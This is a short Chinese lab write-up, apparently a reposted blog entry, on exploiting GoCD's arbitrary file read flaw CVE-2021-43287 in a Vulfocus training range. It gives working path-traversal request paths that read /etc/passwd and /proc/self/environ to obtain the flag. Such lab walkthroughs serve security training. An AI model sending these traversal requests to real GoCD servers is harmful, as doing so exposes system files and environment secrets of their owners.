Vulfocus靶场 | GoCD 任意文件读取漏洞 (CVE-2021-43287)
作者:互联网
漏洞描述
GoCD 一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。
漏洞复现
通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取
点击会自动下载一个文件
flag:
因为找个漏洞是任意文件读取
但是这个靶场中flag是在tmp目录下,也没办法查看目录下的文件
/proc/self/environ是Linux系统下的环境变量文件,用于保存系统的一些变量。
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../proc/self/environ
标签:文件,读取,..,Vulfocus,GoCD,漏洞,2021,Go,ThoughtWorks 来源: https://www.cnblogs.com/mlxwl/p/16608969.html